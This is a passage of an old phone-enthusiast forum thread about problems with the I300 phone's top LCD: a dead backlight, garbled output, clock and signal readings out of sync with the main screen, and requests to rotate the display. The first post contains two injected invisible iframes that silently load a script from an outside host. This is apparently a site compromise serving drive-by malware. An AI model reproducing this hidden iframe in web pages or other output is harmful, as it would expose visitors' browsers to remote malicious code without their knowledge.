+ Reply to Thread
    JLF

Angry Problems with LCD display on top of phone ?

Only have had my phone out of the box for a week, and I seem to be having problems with the LCD display on the top of the phone.

1) The backlight seems to have stopped working

2) Sometimes the LCD display does not power up when the phone is turned on. It remains blank even when the phone is on.

3) Sometimes the LCD degrades and displays gibberish. Eventually it returns to its normal state.

Has anyone else experienced issues with the LCD display ? Doe Sprint have a good exchange program for broken phones (i.e., they ship me one before I send them back my malfunctioning phone).<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Last edited by JLF; 01-02-2002 at 08:08 AM.

Administrator

Arrow

make sure you getthe equipment replacement plan which is 4 /month i believe.. they will replace the phone and send you a new one in the mail. you fill out a claim to their insurance co.. they send you the phone(2-3 days) and you return the old one back to them...

if you have not expired your 14 day return policy then take it back and they should give you another one. your phone sounds a little buggy...

Time on LCD doesn't agree with palm...

Have any of you noticed that the times don't always agree between the top LCD and the palm/phone?

I looked down at the LCD today and it said 8:40 but my car time said 9:05, so I checked the phone,and it said 9:04. I removed the keyguard on the phone and the LCD was changed to 9:04....

I thought it might be a keyguard issue, so I put the keyguard back on, but the LCD time kept up with the phone...

Then later tonight, while the keyguard was off, and my phone was sitting on the table, I noticed the LCD was about 10 behind the phone....

Apparently these two times come from different sources! Today is the first day I've really looked at the LCD after reading the FAQ about turning the LCD backlight on!

chw

Administrator

Arrow

i think when the screen is off, its not updated until the screen is turned back on... i have noticed this too, but as soon as i turn off kryguard or turn on the screen , everythings reverts back to normal. even when i lose a signal (when im in a building for example) and i turn the screen off there, only when i turn the screen bakc on will it "update" the screen.. the phone still works normally though. so i wouldnt worry about it..

I just noticed that the screen and the LCD are out of sync and I am trying to determine which is right. My screen tells me I have a good signal but the LCD says no service. I try to make a call and *boom*, the screen switches and tells me I have no service. It appears when the screen is off (for me), it takes a few seconds or a little prompt for the screen to be in sync with the LCD. In this case, the LCD appears to be a step ahead of the screen. This contrasts with others who have noticed the opposite.

Bruce Sneddon

Question Can the top display be rotated 180 degrees?

When I wear the I300 on my belt in its E&B case and look down at the top display, it is facing the wrong way (upside down). Is there a way to flip the top display 180 degrees? That way I can look down at the phone on my belt and read the time or the caller ID.

Thanks!

You may want to run a search on "flip" or something. The answer is no after a couplke of members did flip the screen. The only problem was that it didn't fit correctly and seemed to be more trouble than it was worth.

Lightbulb

This sounds like a great idea for another hack, Jake...as if you're not busy enough already with all of the other I300 hacks...I have been wanting this feature ever since I got my phone and EB Slipper...when you have to look through the glare on the little, vinyl window and read upside down, it's almost easier (in fact, it is) to just open the darn case and look at the main LCD...

Since the top LCD is completely dot-matrix-style (no "set" icons or graphics), can it be addressed like a regular display and "rotated"? A friend of mine said there is a utility out there for the Palm that will let you rotate the screen, and that it recognizes the top LCD on the I300 as a screen and can flip it...he sounds full of it to me...I told him if it could be done, there would definitely be a mention of it on here!

CK

Can we see a show of hands for those who want this feature?

Re: Can the top display be rotated 180 degrees?

Originally posted by mlnyc
    When I wear the I300 on my belt in its E&B case and look down at the top display, it is facing the wrong way (upside down). Is there a way to flip the top display 180 degrees? That way I can look down at the phone on my belt and read the time or the caller ID.

Thanks!
    I just put my phone in my case backwards. This has 2 benefits. The screen side of the phone is facing inward, thus protecting it, and I can see the LCD correctly. I know it is a low tech solution, but it works. BTW, I have the el cheapo $10 Sanyo neoprene case from Target. The phone fits perfectly in it. I did have to replace mine yesterday though, I lost my other one.
    Carl